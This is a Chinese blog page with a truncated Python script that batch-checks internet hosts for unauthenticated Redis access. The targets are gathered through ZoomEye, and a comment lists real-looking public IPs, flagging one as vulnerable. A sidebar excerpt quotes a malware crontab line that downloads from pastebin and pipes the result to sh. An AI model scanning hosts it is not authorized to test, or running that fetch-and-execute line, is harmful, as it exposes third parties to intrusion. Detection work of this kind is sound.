批量检测开放了6379端口(Redis服务)的主机,是否存在未授权访问漏洞

最新推荐文章于 2024-05-18 14:33:26 发布
最新推荐文章于 2024-05-18 14:33:26 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: Python网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jexsen/article/details/115251764
版权
使用threading多线程模块的demo1.先使用上一篇博客的脚本执行结果,保存为ip.txt,文件中存入了调用ZoomEye的官方api搜索的开放了6379端口的ip地址。(6379为默认的Redis服务)https://blog.csdn.net/jexsen/article/details/1152479122.执行本脚本,有三种检测方式:第一种方式为加载ip.txt文本批量检测是否存在Redis未授权访问漏洞。第二种方式为检测单个ip是否在Redis未授权访问漏洞。第三种方式为检测一个
摘要由CSDN通过智能技术生成

批量检测开放了6379端口(Redis服务)的主机,是否存在未授权访问漏洞

1.先使用上一篇博客的脚本执行结果,保存为ip.txt,文件中存入了调用ZoomEye的官方api搜索的开放了6379端口的ip地址。(6379为默认的Redis服务)
https://blog.csdn.net/jexsen/article/details/115247912

2.执行本脚本,有三种检测方式:
通过执行脚本的-u参数,做了一个逻辑判断,如果-u ip.txt 则批量检测txt中的ip,如果 -u ip则检测单个ip主机,如果 -u 103.25.126.237-255 则检测c段的ip。

执行命令:

第一种方式为加载ip.txt文本批量检测是否存在Redis未授权访问漏洞。
python redis_unauthorized_access.py -u ip.txt -p 6379 -s Redis

第二种方式为检测单个ip是否在Redis未授权访问漏洞。
python redis_unauthorized_access.py -u 196.21.83.203 -p 6379 -s Redis

第三种方式为检测一个ip段里的主机是否在Redis未授权访问漏洞。
python redis_unauthorized_access.py -u 196.21.83.203-207 -p 6379 -s Redis

# -*- coding:utf-8 -*-
import socket
import sys
import getopt
from zoomeye_test import *

# banner信息
# ['196.31.63.210:6379', '196.21.83.203:6379', '45.60.228.37:6379', '121.5.230.102:6379', '35.194.110.251:6379', '103.25.126.237:6379', '114.67.120.216:6379', '103.47.208.44:6379', '106.15.109.65:6379', '170.106.153.75:6379', '107.154.132.173:6379', '47.99.243.149:6379', '62.77.154.214:6379', '114.55.108.87:6379', '103.28.250.209:6379', '78.39.227.16:6379', '78.46.242.32:6379', '78.47.42.51:6379', '78.47.89.33:6379', '78.47.48.68:6379']
# 196.21.83.203:6379 这台电脑是success

# 打印横幅广告

ip_list = []


def banner():
    print(
        '''
.d8888P d8888b. d88888P .d888b.          dP                         dP       
88'         `88     d8' Y8' `88          88                         88       
88baaa.  aaad8'    d8'  `8bad88 .d8888b. 88d888b. .d8888b. .d8888b. 88  .dP  
88` `88     `88   d8'       `88 88'  `"" 88'  `88 88ooood8 88'  `"" 88888"   
8b. .d8     .88  d8'    d.  .88 88.  ... 88    88 88.  ... 88.  ... 88  `8b. 
`Y888P' d88888P d8'     `8888P  `88888P' dP    dP `88888P' `88888P' dP   `YP 

    '''
    )


# 人工启动脚本输入参数的规则
def usage():
    print('-h: --help 帮助;')
    print('-p: --port 端口;')
    print('-u: --url  域名;')
    print('-f: --file 文件;')
    print('-s: --type Redis;')
    sys.exit()


# 未授权函数检测,传入url和端口
def redis_unauthored(url, port):
    # 建立一个空列表
    result = []

    # 建立socket对象
    s = socket.socket()

    # 攻击语句
    payload = "\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a"

    # 设置socket的默认超时时间
    socket.setdefaulttimeout(10)

    for ip in url:
        try:
            # 尝试连接ip和端口
            s.connect((ip, int(port))
最低0.47元/天 解锁文章
j0101_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。攻击者在...
解决腾讯云服务器存在端口(6379)对外攻击行为
m0_53078233的博客
04-13 7768
解决腾讯云服务器存在端口(6379)对外攻击行为
在渗透测试中,探测到6379端口,你打算怎么利用
vivlol918的博客
08-28 2699
6379端口Redis数据库的默认端口号。Redis是一种基于键值对的内存数据库,具有高性能和灵活的数据存储和检索功能。
Python 渗透测试:Redis 数据库 弱密码测试.(6379端口
网络安全领域___专研者.
05-18 454
Redis (Remote Dictionary Server) 是一个开源的、内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。它支持多种类型的数据结构,如字符串(strings)、哈希(hashes)、列表(lists)、集合(sets)、有序集合(sorted sets)等,并且能够对这些数据结构进行高级操作。Redis 数据库爆破是指利用暴力破解的方式尝试获取 Redis 数据库的访问权限。
redis通过6379端口无法连接服务器
波风水门
10-17 1万+
看了网上很多解决方案,都是端口问题,将127.0.0.1改为0.0.0.0,就ok了,但是本人的问题不是端口问题,端口本来就是0.0.0.0。 其实redis无法连接数据库就只有这几种可能,防火墙,安全组,密码,绑定IP。这次的问题感觉还是比较让人费解的,当更换端口号的时候就可以,默认端口6379就是不行。 按照顺序依次检查了防火墙,安全组,密码,配置文件,都确认没有问题之后,再次启动redis,...
关于redis出现6379端口号异常处理方法
qq_38697743的博客
04-04 5607
关于redis出现6379端口号异常处理方法 问题查看: 1、查看端口号是否被占用 netstat -ano 查看全部 netstat -aon | findstr “6379” 查看6379 显示正常 2、服务重启 运行services.msc,重启redis ,显示失败 最终解决办法: redis-server --port 端口号(自定义) Redis下载 之后6379端口号可以用了,具体原因不清楚 ...
redis端口号为什么是6379
yhquser的博客
07-22 5699
6379在是手机按键上MERZ对应的号码,而MERZ取自意大利歌女Alessia Merz的名字。MERZ长期以来被Redis作者antirez及其朋友当作愚蠢的代名词。后来Redis作者在开发Redis时就选用了这个端口。 ——Alessia Merz 是一位意大利舞女、女演员。 Redis 作者 Antirez 早年看电视节目,觉得 Merz 在节目中的一些话愚蠢可笑,Antirez 喜欢造...
Redis授权访问配合SSH key文件利用详解
09-09
主要给大家介绍了关于Redis授权访问配合SSH key文件利用的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
redis服务器允许远程主机访问的方法
12-16
若远程主机需要访问redis服务器,可以修改redis.conf配置文件 bind字段默认为: bind 127.0.0.1 这样只能本机访问redis 若允许远程主机访问,可注释掉bind行 或者 将bind 127.0.0.1改为: bind 0.0.0.0 在远程主机...
Redis的默认端口6379
weixin_36369311的博客
04-04 4970
Redis创始人Salvatore Sanfilippo,曾在文章“Redis as an LRU cache ”解释为何以6379为默认端口。 文章链接:http://oldblog.antirez.com/post/redis-as-LRU-cache.html 截取其中关于6379的片段 对照手机的九宫格 就可发现为何Redis的默认端口6379 ...
常用端口号汇总:常用端口号与对应的服务
zy1992As的博客
08-29 6154
21端口:FTP 文件传输服务22端口:SSH 远程连接服务23端口:TELNET 终端仿真服务25端口:SMTP 简单邮件传输服务53端口:DNS 域名解析服务80端口:HTTP 超文本传输服务443端口:HTTPS 加密的超文本传输服务3306端口:MYSQL数据库端口5432端口:PostgreSQL数据库端口6379端口Redis数据库端口8080端口TCP服务端默认端口8888端口:Nginx服务器端口9200端口:Elasticsearch服务器端口
简单的开放redis6379端口
qq_43060570的博客
04-15 1707
首先当然就是关防火墙啦 然后 1.找到redis中的redis.cof文件并打开 2.找到bind 127.0.0.1并注释掉 3.修改 protected-mode 属性值为no ps:redis默认是只能本地访问,注释掉并叫保护模式禁用以后可以IP访问 这样就可以了 ...
Redis端口为什么是6379?
corleone_4ever的博客
01-30 1万+
先介绍下redis的作者Salvatore Sanfilippo(Antirez),意大利人,就是下图这位。 Antirez现在已经40多岁了,依然奋斗在代码一线,为开源社区做贡献。Antirez出生在非英语系国家,所以英语一直是他的短板。他曾经写过一篇博文,《英语伤痛 15 年》,以自己的实际经历鼓励非英语系国家的程序员突破英语障碍。或说回来,在他的另一篇博文《Redis as an...
redis 6379端口不通解决方法
热门推荐
qq_36133698的博客
07-18 3万+
1.reids服务器6379端口telnet不通 2. 查看reids进程和端口,都是存在的。只是ip地址是127.0.0.1而不是0.0.0.0,只是本机能使用 3.查找redis的配置文件redis.conf   使用命令:find / -name redis.conf  4.查找bind 127.0.0.1所在的行数    使用命令:cat /usr/local/re...
小记:年轻啊开了6379端口中了挖矿病毒(kthrotlds)
打卤的博客
04-11 5170
中毒现象cpu飙升,crontab自动任务被清,出现恶意自动任务无法清除。 */15 * * * *(curl -fsSL https://pastebin.com/raw/v5XC0BJ||wget -q -O- https://pastebin.com/raw/v5XC0BJ)|sh 怎么办怎么办,愁啊,生产环境啊。还是git上大神好人多啊,一个脚本就搞定了。 https://github.c...
CentOS7下开启redis6379端口
qq_43694194的博客
03-14 4167
Centos7下关于防火墙的一些命令 文章目录Centos7下关于防火墙的一些命令前言查看端口信息开启防火墙查看防火墙状态开启端口再重新查看端口信息如果防火墙6379 端口开了并且阿里云安全组也开放了这个时候就可以直接访问远程了! 前言 今天在阿里云服务器CentOS7上安装了redis数据库,需要在防火墙开启默认端口6379,遇到了一些问题及解决方法。 查看端口信息 [root@clp ~]# firewall-cmd --list-ports 结果是: 即防火墙开启,那下面就去开启防火墙 开
Linux默认端口介绍
JackieBlog
04-13 6138
Linux端口介绍
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用程序和数据造成极大的安全风险。 攻击者通常会利用一些特定的工具或者脚本进行扫描,寻找处于授权状态的Redis服务。这些工具会自动化地进行扫描并利用默认口令或弱口令进行暴力破解,从而获取服务器权限。 为了避免Redis授权访问漏洞的发生,建议管理员在使用Redis时,采取以下措施: 1. 禁止访问:将Redis服务器部署在内网中,并禁止对开放访问。 2. 修改默认口令:使用较为复杂的口令,并定期更换口令。 3. 启用身份验证:启用Redis的身份验证功能,只允许已授权的用户访问。 4. 定期更新补丁:及时更新Redis的安全补丁,以修复已知漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值